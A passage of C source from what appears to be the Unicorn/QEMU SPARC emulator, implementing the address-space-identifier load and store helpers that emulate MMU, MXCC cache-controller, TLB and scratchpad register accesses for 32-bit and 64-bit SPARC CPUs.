0x4a: /* SuperSPARC MMU Counter Breakpoint Control */ ret = env->mmubpctrc; break; case 0x4b: /* SuperSPARC MMU Counter Breakpoint Status */ ret = env->mmubpctrs; break; case 0x4c: /* SuperSPARC MMU Breakpoint Action */ ret = env->mmubpaction; break; case ASI_USERTXT: /* User code access, XXX */ default: sparc_raise_mmu_fault(cs, addr, false, false, asi, size, GETPC()); ret = 0; break; case ASI_USERDATA: /* User data access */ case ASI_KERNELDATA: /* Supervisor data access */ case ASI_P: /* Implicit primary context data access (v9 only?) */ case ASI_M_BYPASS: /* MMU passthrough */ case ASI_LEON_BYPASS: /* LEON MMU passthrough */ /* These are always handled inline. */ g_assert_not_reached(); } if (sign) { switch (size) { case 1: ret = (int8_t) ret; break; case 2: ret = (int16_t) ret; break; case 4: ret = (int32_t) ret; break; default: break; } } #ifdef DEBUG_ASI dump_asi("read ", last_addr, asi, size, ret); #endif return ret; } void helper_st_asi(CPUSPARCState *env, target_ulong addr, uint64_t val, int asi, uint32_t memop) { int size = 1 << (memop & MO_SIZE); CPUState *cs = env_cpu(env); do_check_align(env, addr, size - 1, GETPC()); switch (asi) { case ASI_M_MXCC: /* SuperSparc MXCC registers, or... 
*/ /* case ASI_LEON_CACHEREGS: Leon3 cache control */ switch (addr) { case 0x00: /* Leon3 Cache Control */ case 0x08: /* Leon3 Instruction Cache config */ case 0x0C: /* Leon3 Date Cache config */ if (env->def.features & CPU_FEATURE_CACHE_CTRL) { leon3_cache_control_st(env, addr, val, size); } break; case 0x01c00000: /* MXCC stream data register 0 */ if (size == 8) { env->mxccdata[0] = val; } else { qemu_log_mask(LOG_UNIMP, "%08x: unimplemented access size: %d\n", addr, size); } break; case 0x01c00008: /* MXCC stream data register 1 */ if (size == 8) { env->mxccdata[1] = val; } else { qemu_log_mask(LOG_UNIMP, "%08x: unimplemented access size: %d\n", addr, size); } break; case 0x01c00010: /* MXCC stream data register 2 */ if (size == 8) { env->mxccdata[2] = val; } else { qemu_log_mask(LOG_UNIMP, "%08x: unimplemented access size: %d\n", addr, size); } break; case 0x01c00018: /* MXCC stream data register 3 */ if (size == 8) { env->mxccdata[3] = val; } else { qemu_log_mask(LOG_UNIMP, "%08x: unimplemented access size: %d\n", addr, size); } break; case 0x01c00100: /* MXCC stream source */ { int i; if (size == 8) { env->mxccregs[0] = val; } else { qemu_log_mask(LOG_UNIMP, "%08x: unimplemented access size: %d\n", addr, size); } for (i = 0; i < 4; i++) { MemTxResult result; hwaddr access_addr = (env->mxccregs[0] & 0xffffffffULL) + 8 * i; env->mxccdata[i] = glue(address_space_ldq, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, access_addr, MEMTXATTRS_UNSPECIFIED, &result); if (result != MEMTX_OK) { /* TODO: investigate whether this is the right behaviour */ sparc_raise_mmu_fault(cs, access_addr, false, false, false, size, GETPC()); } } break; } case 0x01c00200: /* MXCC stream destination */ { int i; if (size == 8) { env->mxccregs[1] = val; } else { qemu_log_mask(LOG_UNIMP, "%08x: unimplemented access size: %d\n", addr, size); } for (i = 0; i < 4; i++) { MemTxResult result; hwaddr access_addr = (env->mxccregs[1] & 0xffffffffULL) + 8 * i; glue(address_space_stq, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, access_addr, env->mxccdata[i], MEMTXATTRS_UNSPECIFIED, &result); if (result != MEMTX_OK) { /* TODO: investigate whether this is the right behaviour */ sparc_raise_mmu_fault(cs, access_addr, true, false, false, size, GETPC()); } } break; } case 0x01c00a00: /* MXCC control register */ if (size == 8) { env->mxccregs[3] = val; } else { qemu_log_mask(LOG_UNIMP, "%08x: unimplemented access size: %d\n", addr, size); } break; case 0x01c00a04: /* MXCC control register */ if (size == 4) { env->mxccregs[3] = (env->mxccregs[3] & 0xffffffff00000000ULL) | val; } else { qemu_log_mask(LOG_UNIMP, "%08x: unimplemented access size: %d\n", addr, size); } break; case 0x01c00e00: /* MXCC error register */ /* writing a 1 bit clears the error */ if (size == 8) { env->mxccregs[6] &= ~val; } else { qemu_log_mask(LOG_UNIMP, "%08x: unimplemented access size: %d\n", addr, size); } break; case 0x01c00f00: /* MBus port address register */ if (size == 8) { env->mxccregs[7] = val; } else { qemu_log_mask(LOG_UNIMP, "%08x: unimplemented access size: %d\n", addr, size); } break; default: qemu_log_mask(LOG_UNIMP, "%08x: unimplemented address, size: %d\n", addr, size); break; } DPRINTF_MXCC("asi = %d, size = %d, addr = %08x, val = %" PRIx64 "\n", asi, size, addr, val); #ifdef DEBUG_MXCC dump_mxcc(env); #endif break; case ASI_M_FLUSH_PROBE: /* SuperSparc MMU flush */ case ASI_LEON_MMUFLUSH: /* LEON3 MMU flush */ { int mmulev; mmulev = (addr >> 8) & 15; DPRINTF_MMU("mmu flush level %d\n", mmulev); switch (mmulev) { case 0: /* flush page */ 
tlb_flush_page(cs, addr & 0xfffff000); break; case 1: /* flush segment (256k) */ case 2: /* flush region (16M) */ case 3: /* flush context (4G) */ case 4: /* flush entire */ tlb_flush(cs); break; default: break; } #ifdef DEBUG_MMU dump_mmu(env); #endif } break; case ASI_M_MMUREGS: /* write MMU regs */ case ASI_LEON_MMUREGS: /* LEON3 write MMU regs */ { int reg = (addr >> 8) & 0x1f; uint32_t oldreg; oldreg = env->mmuregs[reg]; switch (reg) { case 0: /* Control Register */ env->mmuregs[reg] = (env->mmuregs[reg] & 0xff000000) | (val & 0x00ffffff); /* Mappings generated during no-fault mode are invalid in normal mode. */ if ((oldreg ^ env->mmuregs[reg]) & (MMU_NF | env->def.mmu_bm)) { tlb_flush(cs); } break; case 1: /* Context Table Pointer Register */ env->mmuregs[reg] = val & env->def.mmu_ctpr_mask; break; case 2: /* Context Register */ env->mmuregs[reg] = val & env->def.mmu_cxr_mask; if (oldreg != env->mmuregs[reg]) { /* we flush when the MMU context changes because QEMU has no MMU context support */ tlb_flush(cs); } break; case 3: /* Synchronous Fault Status Register with Clear */ case 4: /* Synchronous Fault Address Register */ break; case 0x10: /* TLB Replacement Control Register */ env->mmuregs[reg] = val & env->def.mmu_trcr_mask; break; case 0x13: /* Synchronous Fault Status Register with Read and Clear */ env->mmuregs[3] = val & env->def.mmu_sfsr_mask; break; case 0x14: /* Synchronous Fault Address Register */ env->mmuregs[4] = val; break; default: env->mmuregs[reg] = val; break; } if (oldreg != env->mmuregs[reg]) { DPRINTF_MMU("mmu change reg[%d]: 0x%08x -> 0x%08x\n", reg, oldreg, env->mmuregs[reg]); } #ifdef DEBUG_MMU dump_mmu(env); #endif } break; case ASI_M_TLBDIAG: /* Turbosparc ITLB Diagnostic */ case ASI_M_DIAGS: /* Turbosparc DTLB Diagnostic */ case ASI_M_IODIAG: /* Turbosparc IOTLB Diagnostic */ break; case ASI_M_TXTC_TAG: /* I-cache tag */ case ASI_M_TXTC_DATA: /* I-cache data */ case ASI_M_DATAC_TAG: /* D-cache tag */ case ASI_M_DATAC_DATA: /* D-cache data */ case ASI_M_FLUSH_PAGE: /* I/D-cache flush page */ case ASI_M_FLUSH_SEG: /* I/D-cache flush segment */ case ASI_M_FLUSH_REGION: /* I/D-cache flush region */ case ASI_M_FLUSH_CTX: /* I/D-cache flush context */ case ASI_M_FLUSH_USER: /* I/D-cache flush user */ break; case 0x21: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x22: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x23: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x24: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x25: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x26: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x27: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x28: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x29: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x2a: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x2b: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x2c: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x2d: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x2e: /* MMU passthrough, 0x100000000 to 0xfffffffff */ case 0x2f: /* MMU passthrough, 0x100000000 to 0xfffffffff */ { MemTxResult result; hwaddr access_addr = (hwaddr)addr | ((hwaddr)(asi & 0xf) << 32); switch (size) { case 1: glue(address_space_stb, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, access_addr, val, MEMTXATTRS_UNSPECIFIED, &result); break; case 2: glue(address_space_stw, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, access_addr, val, MEMTXATTRS_UNSPECIFIED, &result); 
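/*
 * A note on the glue(..., UNICORN_ARCH_POSTFIX) calls used for the
 * address_space_* accesses in this function (an assumption about
 * Unicorn's build setup, not stated in this file): Unicorn links
 * several QEMU targets into a single library, so per-target builds of
 * common functions such as address_space_stb() get an architecture
 * suffix token-pasted on via glue() to keep their symbols from
 * colliding.  The extra leading cs->as->uc argument is the uc_struct
 * handle that Unicorn threads through what used to be global QEMU
 * state.
 */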
break; case 4: default: glue(address_space_stl, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, access_addr, val, MEMTXATTRS_UNSPECIFIED, &result); break; case 8: glue(address_space_stq, UNICORN_ARCH_POSTFIX)(cs->as->uc, cs->as, access_addr, val, MEMTXATTRS_UNSPECIFIED, &result); break; } if (result != MEMTX_OK) { sparc_raise_mmu_fault(cs, access_addr, true, false, false, size, GETPC()); } } break; case 0x30: /* store buffer tags or Turbosparc secondary cache diagnostic */ case 0x31: /* store buffer data, Ross RT620 I-cache flush or Turbosparc snoop RAM */ case 0x32: /* store buffer control or Turbosparc page table descriptor diagnostic */ case 0x36: /* I-cache flash clear */ case 0x37: /* D-cache flash clear */ break; case 0x38: /* SuperSPARC MMU Breakpoint Control Registers*/ { int reg = (addr >> 8) & 3; switch (reg) { case 0: /* Breakpoint Value (Addr) */ env->mmubpregs[reg] = (val & 0xfffffffffULL); break; case 1: /* Breakpoint Mask */ env->mmubpregs[reg] = (val & 0xfffffffffULL); break; case 2: /* Breakpoint Control */ env->mmubpregs[reg] = (val & 0x7fULL); break; case 3: /* Breakpoint Status */ env->mmubpregs[reg] = (val & 0xfULL); break; } DPRINTF_MMU("write breakpoint reg[%d] 0x%016x\n", reg, env->mmuregs[reg]); } break; case 0x49: /* SuperSPARC MMU Counter Breakpoint Value */ env->mmubpctrv = val & 0xffffffff; break; case 0x4a: /* SuperSPARC MMU Counter Breakpoint Control */ env->mmubpctrc = val & 0x3; break; case 0x4b: /* SuperSPARC MMU Counter Breakpoint Status */ env->mmubpctrs = val & 0x3; break; case 0x4c: /* SuperSPARC MMU Breakpoint Action */ env->mmubpaction = val & 0x1fff; break; case ASI_USERTXT: /* User code access, XXX */ case ASI_KERNELTXT: /* Supervisor code access, XXX */ default: sparc_raise_mmu_fault(cs, addr, true, false, asi, size, GETPC()); break; case ASI_USERDATA: /* User data access */ case ASI_KERNELDATA: /* Supervisor data access */ case ASI_P: case ASI_M_BYPASS: /* MMU passthrough */ case ASI_LEON_BYPASS: /* LEON MMU passthrough */ case ASI_M_BCOPY: /* Block copy, sta access */ case ASI_M_BFILL: /* Block fill, stda access */ /* These are always handled inline. */ g_assert_not_reached(); } #ifdef DEBUG_ASI dump_asi("write", addr, asi, size, val); #endif } #else /* TARGET_SPARC64 */ uint64_t helper_ld_asi(CPUSPARCState *env, target_ulong addr, int asi, uint32_t memop) { int size = 1 << (memop & MO_SIZE); int sign = memop & MO_SIGN; CPUState *cs = env_cpu(env); uint64_t ret = 0; #if defined(DEBUG_ASI) target_ulong last_addr = addr; #endif asi &= 0xff; do_check_asi(env, asi, GETPC()); do_check_align(env, addr, size - 1, GETPC()); addr = asi_address_mask(env, asi, addr); switch (asi) { case ASI_PNF: case ASI_PNFL: case ASI_SNF: case ASI_SNFL: { TCGMemOpIdx oi; int idx = (env->pstate & PS_PRIV ? (asi & 1 ? MMU_KERNEL_SECONDARY_IDX : MMU_KERNEL_IDX) : (asi & 1 ? MMU_USER_SECONDARY_IDX : MMU_USER_IDX)); #ifdef _MSC_VER if (cpu_get_phys_page_nofault(env, addr, idx) == 0xffffffffffffffffULL) { #else if (cpu_get_phys_page_nofault(env, addr, idx) == -1ULL) { #endif #ifdef DEBUG_ASI dump_asi("read ", last_addr, asi, size, ret); #endif /* exception_index is set in get_physical_address_data. 
*/ cpu_raise_exception_ra(env, cs->exception_index, GETPC()); } oi = make_memop_idx(memop, idx); switch (size) { case 1: ret = helper_ret_ldub_mmu(env, addr, oi, GETPC()); break; case 2: if (asi & 8) { ret = helper_le_lduw_mmu(env, addr, oi, GETPC()); } else { ret = helper_be_lduw_mmu(env, addr, oi, GETPC()); } break; case 4: if (asi & 8) { ret = helper_le_ldul_mmu(env, addr, oi, GETPC()); } else { ret = helper_be_ldul_mmu(env, addr, oi, GETPC()); } break; case 8: if (asi & 8) { ret = helper_le_ldq_mmu(env, addr, oi, GETPC()); } else { ret = helper_be_ldq_mmu(env, addr, oi, GETPC()); } break; default: g_assert_not_reached(); } } break; case ASI_AIUP: /* As if user primary */ case ASI_AIUS: /* As if user secondary */ case ASI_AIUPL: /* As if user primary LE */ case ASI_AIUSL: /* As if user secondary LE */ case ASI_P: /* Primary */ case ASI_S: /* Secondary */ case ASI_PL: /* Primary LE */ case ASI_SL: /* Secondary LE */ case ASI_REAL: /* Bypass */ case ASI_REAL_IO: /* Bypass, non-cacheable */ case ASI_REAL_L: /* Bypass LE */ case ASI_REAL_IO_L: /* Bypass, non-cacheable LE */ case ASI_N: /* Nucleus */ case ASI_NL: /* Nucleus Little Endian (LE) */ case ASI_NUCLEUS_QUAD_LDD: /* Nucleus quad LDD 128 bit atomic */ case ASI_NUCLEUS_QUAD_LDD_L: /* Nucleus quad LDD 128 bit atomic LE */ case ASI_TWINX_AIUP: /* As if user primary, twinx */ case ASI_TWINX_AIUS: /* As if user secondary, twinx */ case ASI_TWINX_REAL: /* Real address, twinx */ case ASI_TWINX_AIUP_L: /* As if user primary, twinx, LE */ case ASI_TWINX_AIUS_L: /* As if user secondary, twinx, LE */ case ASI_TWINX_REAL_L: /* Real address, twinx, LE */ case ASI_TWINX_N: /* Nucleus, twinx */ case ASI_TWINX_NL: /* Nucleus, twinx, LE */ /* ??? From the UA2011 document; overlaps BLK_INIT_QUAD_LDD_* */ case ASI_TWINX_P: /* Primary, twinx */ case ASI_TWINX_PL: /* Primary, twinx, LE */ case ASI_TWINX_S: /* Secondary, twinx */ case ASI_TWINX_SL: /* Secondary, twinx, LE */ /* These are always handled inline. 
*/ g_assert_not_reached(); case ASI_UPA_CONFIG: /* UPA config */ /* XXX */ break; case ASI_LSU_CONTROL: /* LSU */ ret = env->lsu; break; case ASI_IMMU: /* I-MMU regs */ { int reg = (addr >> 3) & 0xf; switch (reg) { case 0: /* 0x00 I-TSB Tag Target register */ ret = ultrasparc_tag_target(env->immu.tag_access); break; case 3: /* SFSR */ ret = env->immu.sfsr; break; case 5: /* TSB access */ ret = env->immu.tsb; break; case 6: /* 0x30 I-TSB Tag Access register */ ret = env->immu.tag_access; break; default: sparc_raise_mmu_fault(cs, addr, false, false, 1, size, GETPC()); ret = 0; } break; } case ASI_IMMU_TSB_8KB_PTR: /* I-MMU 8k TSB pointer */ { /* env->immuregs[5] holds I-MMU TSB register value env->immuregs[6] holds I-MMU Tag Access register value */ ret = ultrasparc_tsb_pointer(env, &env->immu, 0); break; } case ASI_IMMU_TSB_64KB_PTR: /* I-MMU 64k TSB pointer */ { /* env->immuregs[5] holds I-MMU TSB register value env->immuregs[6] holds I-MMU Tag Access register value */ ret = ultrasparc_tsb_pointer(env, &env->immu, 1); break; } case ASI_ITLB_DATA_ACCESS: /* I-MMU data access */ { int reg = (addr >> 3) & 0x3f; ret = env->itlb[reg].tte; break; } case ASI_ITLB_TAG_READ: /* I-MMU tag read */ { int reg = (addr >> 3) & 0x3f; ret = env->itlb[reg].tag; break; } case ASI_DMMU: /* D-MMU regs */ { int reg = (addr >> 3) & 0xf; switch (reg) { case 0: /* 0x00 D-TSB Tag Target register */ ret = ultrasparc_tag_target(env->dmmu.tag_access); break; case 1: /* 0x08 Primary Context */ ret = env->dmmu.mmu_primary_context; break; case 2: /* 0x10 Secondary Context */ ret = env->dmmu.mmu_secondary_context; break; case 3: /* SFSR */ ret = env->dmmu.sfsr; break; case 4: /* 0x20 SFAR */ ret = env->dmmu.sfar; break; case 5: /* 0x28 TSB access */ ret = env->dmmu.tsb; break; case 6: /* 0x30 D-TSB Tag Access register */ ret = env->dmmu.tag_access; break; case 7: ret = env->dmmu.virtual_watchpoint; break; case 8: ret = env->dmmu.physical_watchpoint; break; default: sparc_raise_mmu_fault(cs, addr, false, false, 1, size, GETPC()); ret = 0; } break; } case ASI_DMMU_TSB_8KB_PTR: /* D-MMU 8k TSB pointer */ { /* env->dmmuregs[5] holds D-MMU TSB register value env->dmmuregs[6] holds D-MMU Tag Access register value */ ret = ultrasparc_tsb_pointer(env, &env->dmmu, 0); break; } case ASI_DMMU_TSB_64KB_PTR: /* D-MMU 64k TSB pointer */ { /* env->dmmuregs[5] holds D-MMU TSB register value env->dmmuregs[6] holds D-MMU Tag Access register value */ ret = ultrasparc_tsb_pointer(env, &env->dmmu, 1); break; } case ASI_DTLB_DATA_ACCESS: /* D-MMU data access */ { int reg = (addr >> 3) & 0x3f; ret = env->dtlb[reg].tte; break; } case ASI_DTLB_TAG_READ: /* D-MMU tag read */ { int reg = (addr >> 3) & 0x3f; ret = env->dtlb[reg].tag; break; } case ASI_INTR_DISPATCH_STAT: /* Interrupt dispatch, RO */ break; case ASI_INTR_RECEIVE: /* Interrupt data receive */ ret = env->ivec_status; break; case ASI_INTR_R: /* Incoming interrupt vector, RO */ { int reg = (addr >> 4) & 0x3; if (reg < 3) { ret = env->ivec_data[reg]; } break; } case ASI_SCRATCHPAD: /* UA2005 privileged scratchpad */ if (unlikely((addr >= 0x20) && (addr < 0x30))) { /* Hyperprivileged access only */ sparc_raise_mmu_fault(cs, addr, false, false, 1, size, GETPC()); } /* fall through */ case ASI_HYP_SCRATCHPAD: /* UA2005 hyperprivileged scratchpad */ { unsigned int i = (addr >> 3) & 0x7; ret = env->scratch[i]; break; } case ASI_MMU: /* UA2005 Context ID registers */ switch ((addr >> 3) & 0x3) { case 1: ret = env->dmmu.mmu_primary_context; break; case 2: ret = env->dmmu.mmu_secondary_context; 
break; default: sparc_raise_mmu_fault(cs, addr, true, false, 1, size, GETPC()); } break; case ASI_DCACHE_DATA: /* D-cache data */ case ASI_DCACHE_TAG: /* D-cache tag access */ case ASI_ESTATE_ERROR_EN: /* E-cache error enable */ case ASI_AFSR: /* E-cache asynchronous fault status */ case ASI_AFAR: /* E-cache asynchronous fault address */ case ASI_EC_TAG_DATA: /* E-cache tag data */ case ASI_IC_INSTR: /* I-cache instruction access */ case ASI_IC_TAG: /* I-cache tag access */ case ASI_IC_PRE_DECODE: /* I-cache predecode */ case ASI_IC_NEXT_FIELD: /* I-cache LRU etc. */ case ASI_EC_W: /* E-cache tag */ case ASI_EC_R: /* E-cache tag */ break; case ASI_DMMU_TSB_DIRECT_PTR: /* D-MMU data pointer */ case ASI_ITLB_DATA_IN: /* I-MMU data in, WO */ case ASI_IMMU_DEMAP: /* I-MMU demap, WO */ case ASI_DTLB_DATA_IN: /* D-MMU data in, WO */ case ASI_DMMU_DEMAP: /* D-MMU demap, WO */ case ASI_INTR_W: /* Interrupt vector, WO */ default: sparc_raise_mmu_fault(cs, addr, false, false, 1, size, GETPC()); ret = 0; break; } /* Convert to signed number */ if (sign) { switch (size) { case 1: ret = (int8_t) ret; break; case 2: ret = (int16_t) ret; break; case 4: ret = (int32_t) ret; break; default: break; } } #ifdef DEBUG_ASI dump_asi("read ", last_addr, asi, size, ret); #endif return ret; } void helper_st_asi(CPUSPARCState *env, target_ulong addr, target_ulong val, int asi, uint32_t memop) { int size = 1 << (memop & MO_SIZE); CPUState *cs = env_cpu(env); #ifdef DEBUG_ASI dump_asi("write", addr, asi, size, val); #endif asi &= 0xff; do_check_asi(env, asi, GETPC()); do_check_align(env, addr, size - 1, GETPC()); addr = asi_address_mask(env, asi, addr); switch (asi) { case ASI_AIUP: /* As if user primary */ case ASI_AIUS: /* As if user secondary */ case ASI_AIUPL: /* As if user primary LE */ case ASI_AIUSL: /* As if user secondary LE */ case ASI_P: /* Primary */ case ASI_S: /* Secondary */ case ASI_PL: /* Primary LE */ case ASI_SL: /* Secondary LE */ case ASI_REAL: /* Bypass */ case ASI_REAL_IO: /* Bypass, non-cacheable */ case ASI_REAL_L: /* Bypass LE */ case ASI_REAL_IO_L: /* Bypass, non-cacheable LE */ case ASI_N: /* Nucleus */ case ASI_NL: /* Nucleus Little Endian (LE) */ case ASI_NUCLEUS_QUAD_LDD: /* Nucleus quad LDD 128 bit atomic */ case ASI_NUCLEUS_QUAD_LDD_L: /* Nucleus quad LDD 128 bit atomic LE */ case ASI_TWINX_AIUP: /* As if user primary, twinx */ case ASI_TWINX_AIUS: /* As if user secondary, twinx */ case ASI_TWINX_REAL: /* Real address, twinx */ case ASI_TWINX_AIUP_L: /* As if user primary, twinx, LE */ case ASI_TWINX_AIUS_L: /* As if user secondary, twinx, LE */ case ASI_TWINX_REAL_L: /* Real address, twinx, LE */ case ASI_TWINX_N: /* Nucleus, twinx */ case ASI_TWINX_NL: /* Nucleus, twinx, LE */ /* ??? From the UA2011 document; overlaps BLK_INIT_QUAD_LDD_* */ case ASI_TWINX_P: /* Primary, twinx */ case ASI_TWINX_PL: /* Primary, twinx, LE */ case ASI_TWINX_S: /* Secondary, twinx */ case ASI_TWINX_SL: /* Secondary, twinx, LE */ /* These are always handled inline. */ g_assert_not_reached(); /* these ASIs have different functions on UltraSPARC-IIIi * and UA2005 CPUs. 
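* On UA2005, ASI bit 1 selects the page size (PS0 vs PS1) and ASI bit 3 selects the zero vs non-zero context; the idx computations below decode exactly those two bits.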
Use the explicit numbers to avoid confusion */ case 0x31: case 0x32: case 0x39: case 0x3a: if (cpu_has_hypervisor(env)) { /* UA2005 * ASI_DMMU_CTX_ZERO_TSB_BASE_PS0 * ASI_DMMU_CTX_ZERO_TSB_BASE_PS1 * ASI_DMMU_CTX_NONZERO_TSB_BASE_PS0 * ASI_DMMU_CTX_NONZERO_TSB_BASE_PS1 */ int idx = ((asi & 2) >> 1) | ((asi & 8) >> 2); env->dmmu.sun4v_tsb_pointers[idx] = val; } else { helper_raise_exception(env, TT_ILL_INSN); } break; case 0x33: case 0x3b: if (cpu_has_hypervisor(env)) { /* UA2005 * ASI_DMMU_CTX_ZERO_CONFIG * ASI_DMMU_CTX_NONZERO_CONFIG */ env->dmmu.sun4v_ctx_config[(asi & 8) >> 3] = val; } else { helper_raise_exception(env, TT_ILL_INSN); } break; case 0x35: case 0x36: case 0x3d: case 0x3e: if (cpu_has_hypervisor(env)) { /* UA2005 * ASI_IMMU_CTX_ZERO_TSB_BASE_PS0 * ASI_IMMU_CTX_ZERO_TSB_BASE_PS1 * ASI_IMMU_CTX_NONZERO_TSB_BASE_PS0 * ASI_IMMU_CTX_NONZERO_TSB_BASE_PS1 */ int idx = ((asi & 2) >> 1) | ((asi & 8) >> 2); env->immu.sun4v_tsb_pointers[idx] = val; } else { helper_raise_exception(env, TT_ILL_INSN); } break; case 0x37: case 0x3f: if (cpu_has_hypervisor(env)) { /* UA2005 * ASI_IMMU_CTX_ZERO_CONFIG * ASI_IMMU_CTX_NONZERO_CONFIG */ env->immu.sun4v_ctx_config[(asi & 8) >> 3] = val; } else { helper_raise_exception(env, TT_ILL_INSN); } break; case ASI_UPA_CONFIG: /* UPA config */ /* XXX */ return; case ASI_LSU_CONTROL: /* LSU */ env->lsu = val & (DMMU_E | IMMU_E); return; case ASI_IMMU: /* I-MMU regs */ { int reg = (addr >> 3) & 0xf; uint64_t oldreg; oldreg = env->immu.mmuregs[reg]; switch (reg) { case 0: /* RO */ return; case 1: /* Not in I-MMU */ case 2: return; case 3: /* SFSR */ if ((val & 1) == 0) { val = 0; /* Clear SFSR */ } env->immu.sfsr = val; break; case 4: /* RO */ return; case 5: /* TSB access */ DPRINTF_MMU("immu TSB write: 0x%016" PRIx64 " -> 0x%016" PRIx64 "\n", env->immu.tsb, val); env->immu.tsb = val; break; case 6: /* Tag access */ env->immu.tag_access = val; break; case 7: case 8: return; default: sparc_raise_mmu_fault(cs, addr, true, false, 1, size, GETPC()); break; } if (oldreg != env->immu.mmuregs[reg]) { DPRINTF_MMU("immu change reg[%d]: 0x%016" PRIx64 " -> 0x%016" PRIx64 "\n", reg, oldreg, env->immuregs[reg]); } #ifdef DEBUG_MMU dump_mmu(env); #endif return; } case ASI_ITLB_DATA_IN: /* I-MMU data in */ /* ignore real translation entries */ if (!(addr & TLB_UST1_IS_REAL_BIT)) { replace_tlb_1bit_lru(env->itlb, env->immu.tag_access, val, "immu", env, addr); } return; case ASI_ITLB_DATA_ACCESS: /* I-MMU data access */ { /* TODO: auto demap */ unsigned int i = (addr >> 3) & 0x3f; /* ignore real translation entries */ if (!(addr & TLB_UST1_IS_REAL_BIT)) { replace_tlb_entry(&env->itlb[i], env->immu.tag_access, sun4v_tte_to_sun4u(env, addr, val), env); } #ifdef DEBUG_MMU DPRINTF_MMU("immu data access replaced entry [%i]\n", i); dump_mmu(env); #endif return; } case ASI_IMMU_DEMAP: /* I-MMU demap */ demap_tlb(env->itlb, addr, "immu", env); return; case ASI_DMMU: /* D-MMU regs */ { int reg = (addr >> 3) & 0xf; uint64_t oldreg; oldreg = env->dmmu.mmuregs[reg]; switch (reg) { case 0: /* RO */ case 4: return; case 3: /* SFSR */ if ((val & 1) == 0) { val = 0; /* Clear SFSR, Fault address */ env->dmmu.sfar = 0; } env->dmmu.sfsr = val; break; case 1: /* Primary context */ env->dmmu.mmu_primary_context = val; /* can be optimized to only flush MMU_USER_IDX and MMU_KERNEL_IDX entries */ tlb_flush(cs); break; case 2: /* Secondary context */ env->dmmu.mmu_secondary_context = val; /* can be optimized to only flush MMU_USER_SECONDARY_IDX and MMU_KERNEL_SECONDARY_IDX entries */ 
tlb_flush(cs); break; case 5: /* TSB access */ DPRINTF_MMU("dmmu TSB write: 0x%016" PRIx64 " -> 0x%016" PRIx64 "\n", env->dmmu.tsb, val); env->dmmu.tsb = val; break; case 6: /* Tag access */ env->dmmu.tag_access = val; break; case 7: /* Virtual Watchpoint */ env->dmmu.virtual_watchpoint = val; break; case 8: /* Physical Watchpoint */ env->dmmu.physical_watchpoint = val; break; default: sparc_raise_mmu_fault(cs, addr, true, false, 1, size, GETPC()); break; } if (oldreg != env->dmmu.mmuregs[reg]) { DPRINTF_MMU("dmmu change reg[%d]: 0x%016" PRIx64 " -> 0x%016" PRIx64 "\n", reg, oldreg, env->dmmuregs[reg]); } #ifdef DEBUG_MMU dump_mmu(env); #endif return; } case ASI_DTLB_DATA_IN: /* D-MMU data in */ /* ignore real translation entries */ if (!(addr & TLB_UST1_IS_REAL_BIT)) { replace_tlb_1bit_lru(env->dtlb, env->dmmu.tag_access, val, "dmmu", env, addr); } return; case ASI_DTLB_DATA_ACCESS: /* D-MMU data access */ { unsigned int i = (addr >> 3) & 0x3f; /* ignore real translation entries */ if (!(addr & TLB_UST1_IS_REAL_BIT)) { replace_tlb_entry(&env->dtlb[i], env->dmmu.tag_access, sun4v_tte_to_sun4u(env, addr, val), env); } #ifdef DEBUG_MMU DPRINTF_MMU("dmmu data access replaced entry [%i]\n", i); dump_mmu(env); #endif return; } case ASI_DMMU_DEMAP: /* D-MMU demap */ demap_tlb(env->dtlb, addr, "dmmu", env); return; case ASI_INTR_RECEIVE: /* Interrupt data receive */ env->ivec_status = val & 0x20; return; case ASI_SCRATCHPAD: /* UA2005 privileged scratchpad */ if (unlikely((addr >= 0x20) && (addr < 0x30))) { /* Hyperprivileged access only */ sparc_raise_mmu_fault(cs, addr, true, false, 1, size, GETPC()); } /* fall through */ case ASI_HYP_SCRATCHPAD: /* UA2005 hyperprivileged scratchpad */ { unsigned int i = (addr >> 3) & 0x7; env->scratch[i] = val; return; } case ASI_MMU: /* UA2005 Context ID registers */ { switch ((addr >> 3) & 0x3) { case 1: env->dmmu.mmu_primary_context = val; env->immu.mmu_primary_context = val; tlb_flush_by_mmuidx(cs, (1 << MMU_USER_IDX) | (1 << MMU_KERNEL_IDX)); break; case 2: env->dmmu.mmu_secondary_context = val; env->immu.mmu_secondary_context = val; tlb_flush_by_mmuidx(cs, (1 << MMU_USER_SECONDARY_IDX) | (1 << MMU_KERNEL_SECONDARY_IDX)); break; default: sparc_raise_mmu_fault(cs, addr, true, false, 1, size, GETPC()); } } return; case ASI_QUEUE: /* UA2005 CPU mondo queue */ case ASI_DCACHE_DATA: /* D-cache data */ case ASI_DCACHE_TAG: /* D-cache tag access */ case ASI_ESTATE_ERROR_EN: /* E-cache error enable */ case ASI_AFSR: /* E-cache asynchronous fault status */ case ASI_AFAR: /* E-cache asynchronous fault address */ case ASI_EC_TAG_DATA: /* E-cache tag data */ case ASI_IC_INSTR: /* I-cache instruction access */ case ASI_IC_TAG: /* I-cache tag access */ case ASI_IC_PRE_DECODE: /* I-cache predecode */ case ASI_IC_NEXT_FIELD: /* I-cache LRU etc. 
